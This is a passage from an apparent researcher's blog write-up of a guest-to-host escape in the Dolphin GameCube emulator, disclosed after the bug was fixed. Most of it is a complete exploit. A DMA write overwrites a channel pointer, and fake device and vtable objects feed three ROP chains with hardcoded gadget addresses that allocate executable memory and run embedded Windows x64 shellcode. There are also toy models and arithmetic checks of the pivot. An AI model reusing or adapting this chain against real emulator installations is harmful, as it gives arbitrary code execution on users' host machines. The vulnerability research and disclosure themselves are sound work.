    __sram_write(buf, sizeof(buf));
}

Running this shows that there's a trivially controllable virtual call. Nice!

Specifically, this is happening in ExpansionInterface::UpdateInterrupts(), which gets called immediately after the broken DMA transfer completes. IsInterruptSet is the controllable virtual call on the fake IEXIDevice object.

void UpdateInterrupts()
{
	// Interrupts are mapped a bit strangely:
	// Channel 0 Device 0 generates interrupt on channel 0
	// Channel 0 Device 2 generates interrupt on channel 2
	// Channel 1 Device 0 generates interrupt on channel 1
	g_Channels[2]->SetEXIINT(g_Channels[0]->GetDevice(4)->IsInterruptSet());

	bool causeInt = false;
	for (auto& channel : g_Channels)
		causeInt |= channel->IsCausingInterrupt();

	ProcessorInterface::SetInterrupt(ProcessorInterface::INT_CAUSE_EXI, causeInt);
}
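
To make the pointer chain concrete, here is a host-side toy model in plain C. It is not Dolphin's code: the Toy* types, the slot index, and the simplified device lookup are all assumptions for illustration (the chip-select mapping is inferred from the comment above, where GetDevice(4) corresponds to device 2). It only shows why controlling the g_Channels[0] pointer is enough to choose the function that gets called: channel, then device pointer, then vtable pointer, then slot.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical stand-ins for the C++ objects; the layout is illustrative only. */
typedef int (*virtual_fn)(void *self);

typedef struct {
    const virtual_fn *vtable;   /* first word of a C++ object with virtuals */
} ToyDevice;

typedef struct {
    ToyDevice *devices[3];
} ToyChannel;

enum { TOY_SLOT_IS_INTERRUPT_SET = 2 };  /* assumed slot, not the real index */

/* Simplified lookup: chip-select bits 1, 2, 4 pick devices 0, 1, 2. */
static ToyDevice *toy_get_device(ToyChannel *ch, unsigned chip_select) {
    switch (chip_select) {
    case 1: return ch->devices[0];
    case 2: return ch->devices[1];
    case 4: return ch->devices[2];
    default: return NULL;
    }
}

/* What a virtual call like device->IsInterruptSet() boils down to. */
static int toy_is_interrupt_set(ToyDevice *dev) {
    return dev->vtable[TOY_SLOT_IS_INTERRUPT_SET](dev);
}

static int benign(void *self) { (void)self; return 0; }
static int attacker_chosen(void *self) { (void)self; return 1337; }

/* Build a fake channel whose devices all point at a fake vtable, then
   dispatch through it the way UpdateInterrupts does. */
static int toy_dispatch_through_fake_channel(void) {
    static const virtual_fn fake_vtbl[] = { benign, benign, attacker_chosen };
    ToyDevice fake_device = { fake_vtbl };
    ToyChannel fake_channel = { { &fake_device, &fake_device, &fake_device } };

    /* Slot 0 stands in for the overwritten g_Channels[0]. */
    ToyChannel *channels[3] = { &fake_channel, NULL, NULL };
    return toy_is_interrupt_set(toy_get_device(channels[0], 4));
}
```

Calling toy_dispatch_through_fake_channel() runs attacker_chosen, since every level of indirection was supplied by the fake objects. In the real exploit each of those levels is a byteswapped host address pointing back into guest RAM.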

I'm not going to go through the whole process of how I wrote the ROP chain for this since that isn't very interesting, but here's the final exploit code:

#include <string.h>
#include <gccore.h>
#include <ogc/machine/processor.h>

// Adapted from internal libogc code
static void __sram_write(void *buffer, u32 size) {
    EXI_Lock(EXI_CHANNEL_0, EXI_DEVICE_1, NULL);
    EXI_Select(EXI_CHANNEL_0, EXI_DEVICE_1, EXI_SPEED8MHZ);

    u32 cmd = 0xA0000100;
    EXI_Imm(EXI_CHANNEL_0, &cmd, 4, EXI_WRITE, NULL);
    EXI_Sync(EXI_CHANNEL_0);
    EXI_Dma(EXI_CHANNEL_0, buffer, size, EXI_WRITE, NULL);
}

typedef struct {
    u8 gap0[0x18];
    u64 m_devices[3]; // IEXIDevice*[3]
    u8 gap30[0x8];
} CEXIChannel;
static_assert(sizeof(CEXIChannel) == 0x38);

#define RAM_BASE 0x7FFF0000uL
#define TARGET_PTR_OFFSET 0x58

static u64 guest_to_host_addr(const void* input) {
    return RAM_BASE + ((u32)input & 0x7FFFFFFF);
}

// Don't feel like writing my own calc shellcode for this
// https://github.com/boku7/x64win-DynamicNoNull-WinExec-PopCalc-Shellcode/blob/main/win-x64-DynamicKernelWinExecCalc.asm
static const u8 shellcode[] =
    "\x48\x31\xff\x48\xf7\xe7\x65\x48\x8b\x58\x60\x48\x8b\x5b\x18\x48\x8b\x5b\x20\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20\x49\x89\xd8\x8b"
    "\x5b\x3c\x4c\x01\xc3\x48\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x8b\x14\x0b\x4c\x01\xc2\x4d\x31\xd2\x44\x8b\x52\x1c\x4d\x01\xc2"
    "\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4d\x31\xe4\x44\x8b\x62\x24\x4d\x01\xc4\xeb\x32\x5b\x59\x48\x31\xc0\x48\x89\xe2\x51\x48\x8b"
    "\x0c\x24\x48\x31\xff\x41\x8b\x3c\x83\x4c\x01\xc7\x48\x89\xd6\xf3\xa6\x74\x05\x48\xff\xc0\xeb\xe6\x59\x66\x41\x8b\x04\x44\x41\x8b\x04"
    "\x82\x4c\x01\xc0\x53\xc3\x48\x31\xc9\x80\xc1\x07\x48\xb8\x0f\xa8\x96\x91\xba\x87\x9a\x9c\x48\xf7\xd0\x48\xc1\xe8\x08\x50\x51\xe8\xb0"
    "\xff\xff\xff\x49\x89\xc6\x48\x31\xc9\x48\xf7\xe1\x50\x48\xb8\x9c\x9e\x93\x9c\xd1\x9a\x87\x9a\x48\xf7\xd0\x50\x48\x89\xe1\x48\xff\xc2"
    "\x48\x83\xec\x20\x41\xff\xd6\xcc";

int main() {
    u64 rop_3[] __attribute__((aligned(16))) = {
        // pop rdx; ret
        0x4C06B2,
        guest_to_host_addr(shellcode),

        // pop r8; ret
        0x4EE16B,
        sizeof(shellcode),
        
        // memcpy
        0xEB7E52,
        
        // call rax
        0x41CFE9,
        
        0,
        0,
        
        // Call from rop_2 points here
        // xchg esp, edx; ret
        0x898285,
    };
    for (int i = 0; i < sizeof(rop_3) / sizeof(rop_3[0]); i++)
        rop_3[i] = bswap64(rop_3[i]);
    
    u64 rop_2[] __attribute__((aligned(16))) = {
        // pop rcx; ret
        0x52ABB3,
        sizeof(shellcode),
        
        // Common::AllocateExecutableMemory
        // Second argument doesn't matter
        0xFD2F70,
        
        // add rsp, 0x38; ret
        0x40C3DE,
        0, 0, 0, 0, 0, 0, 0,

        // pop rdx; ret
        0x4C06B2,
        guest_to_host_addr(rop_3),
        
        // mov rcx, rax; call qword ptr [rdx+40h]
        0x10EE58A
    };
    for (int i = 0; i < sizeof(rop_2) / sizeof(rop_2[0]); i++)
        rop_2[i] = bswap64(rop_2[i]);

    // Since rdx points here, this doubles as the first ROP chain
    u64 fake_vtbl[] __attribute__((aligned(16))) = {
        // pop rax; ret
        0x4179B0,
        guest_to_host_addr(rop_2),

        // mov rsp, rax; ret
        0x40EAB0,

        0x0,
        0x0,
        0x0,
        0x0,
        0x0,
        0x0,
        0x0,
        0x0,
        0x0,

        // Initial call points here
        // xchg esp, edx; ret
        0x898285,
    };
    for (int i = 0; i < sizeof(fake_vtbl) / sizeof(fake_vtbl[0]); i++)
        fake_vtbl[i] = bswap64(fake_vtbl[i]);

    u64 fake_device = bswap64(guest_to_host_addr(fake_vtbl));
    
    CEXIChannel fake_channel;
    memset(&fake_channel, 0x99, sizeof(fake_channel));
    for (int i = 0; i < 3; i++)
        fake_channel.m_devices[i] = bswap64(guest_to_host_addr(&fake_device));

    // Overwrites g_Channels[0]
    static char buf[TARGET_PTR_OFFSET + 8];
    u64 ptr = bswap64(guest_to_host_addr(&fake_channel));
    memcpy(buf + TARGET_PTR_OFFSET, &ptr, sizeof(ptr));
    __sram_write(buf, sizeof(buf));
}

A few notes on it:

  • That xchg esp, edx; ret stack pivot gadget works because the Fastmem arena gets allocated at a low enough address for main RAM to fit within the first 4GB of address space.
  • The mov rsp, rax; ret isn't a lucky desynced instruction but is actually the end of ff_put_h264_chroma_mc8_rnd_mmx. No idea why it's there, but it's a great gadget, so I can't complain.
  • Exploiting an emulator with a JIT means that I get convenient functions like Common::AllocateExecutableMemory for getting RWX memory instead of having to VirtualAlloc it myself.
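
The first note can be checked with a few lines of arithmetic. The sketch below assumes 24 MiB of GameCube main RAM and the 0x7FFF0000 arena base used in the exploit; the function names are hypothetical. It models xchg esp, edx as truncating the pointer to 32 bits (on x86-64, writing a 32-bit register zeroes the upper half), and it also converts the [rdx+40h] and add rsp, 0x38 displacements into slots of a u64 chain array.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define ARENA_BASE    0x7FFF0000ull          /* RAM_BASE from the exploit */
#define MAIN_RAM_SIZE (24ull * 1024 * 1024)  /* assumed: 24 MiB of main RAM */

/* Model of `xchg esp, edx`: the new rsp is rdx truncated to 32 bits. */
static uint64_t pivot_result(uint64_t rdx) {
    return (uint32_t)rdx;
}

/* The pivot lands on the intended chain only if truncation changes nothing. */
static bool pivot_is_safe(uint64_t chain_host_addr) {
    return pivot_result(chain_host_addr) == chain_host_addr;
}

/* Highest host address backing guest main RAM under the assumptions above. */
static uint64_t arena_ram_end(void) {
    return ARENA_BASE + MAIN_RAM_SIZE - 1;
}

/* Convert a byte displacement into an index into a u64 chain array. */
static size_t slot_for_displacement(size_t displacement) {
    assert(displacement % sizeof(uint64_t) == 0);
    return displacement / sizeof(uint64_t);
}
```

Under these assumptions arena_ram_end() is 0x817EFFFF, so any chain placed in guest RAM survives the pivot, while a typical high 64-bit address such as 0x00007FF600001000 would not. slot_for_displacement(0x40) gives 8, the index of the final xchg esp, edx entry in rop_3, and slot_for_displacement(0x38) gives 7, matching the seven zero entries that follow add rsp, 0x38 in rop_2.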

I hope you had as much fun reading this as I did working on it! This was something I wanted to write back in January, but I put it off until now. What really pushed me to write this post was getting extremely annoyed at the number of clearly LLM-generated technical blog posts I kept seeing. I figured the only way to get more half-decent posts in the world is to start writing them myself again.

Thanks to Fizzi for the quick response in getting this vulnerability fixed.